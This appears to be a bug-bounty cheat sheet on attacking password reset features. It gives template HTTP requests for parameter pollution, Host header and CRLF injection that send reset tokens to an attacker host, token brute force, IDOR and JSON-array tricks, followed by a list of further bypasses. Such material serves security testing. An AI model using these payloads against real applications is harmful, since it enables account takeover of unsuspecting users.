Skip to content

Password Reset Functionality

Concept

In this vulnerability attacker tries to attack the password rest functionality of the application, if the attacker is successful in doing so this might lead to full account takeover, Below are some way to exploit this attack.

Ways to bypass

Include your email as second parameter

POST  /reset

[....]

email=victim@xyz.com&email=attacker@abc.com

Brute force the password reset token

POST  /reset

[....]

email=victim@xyz.com&token={bruteforce}

Try to use reset token to victims account

POST  /reset

[....]

email=victim@xyz.com&token={yourtoken}

Host header injection

  • Try changing the host, this might lead to passing the token to attackers server
POST  /reset

Host: Attacker.com

Try figuring how the tokens are generated

Like

They might be generated based on timestamp.

They might be generated based on the user id.

They might be generated based on the email id.

CRLF Injection

POST  /reset

[....]

email="victim@mail.tld%0a%0dcc:attacker@mail.tld"
 CLRF:

 POST /resetPassword?0a%0dHost:atracker.tld (x-host, true-client-ip, x-forwarded...)

Business logic

While inviting users into your account/organization,

you can also try inviting company emails and add a new field

"password": "example123". or "pass": "example123" in the

request. you may end up resetting a user password.

(company email can be found here

hunter.io)

JSON array

POST  /reset

[....]

{"email":["victim@mail.tld","atracker@mail.tld"]}

Token leakage via refer header

POST  /reset

[....]

Referer:https://xyz.com/token={token}

IDOR for password reset

  • we can change the id parameter
POST  /reset

[....]

id=1234&

Some other ways

  1. Race condition: Exploit timing dependencies to manipulate password reset processes.

  2. Completely remove the token: Attempt reset without providing a valid token.

  3. Change token to all zeroes: Try resetting with a token composed entirely of zeroes.

  4. Use null/nil value: Provide null or nil instead of a valid token.

  5. Try expired token: Attempt to use a token that has already expired.

  6. Reuse old password reset token: Use a previously used token for reset.

  7. Try an array of old tokens: Attempt reset with multiple old tokens simultaneously.

  8. Modify token slightly: Alter token characters to check for validation weaknesses.

  9. Use Unicode to spoof email: Exploit Unicode characters to manipulate email addresses.

  10. Manipulate email format: Attempt to include multiple addresses or special characters in the email field.

  11. Change request method/content type: Modify HTTP request methods or content types during the reset process.

  12. Manipulate server response: Intercept and alter server responses during reset attempts.

  13. Use super long input: Provide excessively long inputs to exploit validation or buffer overflow vulnerabilities.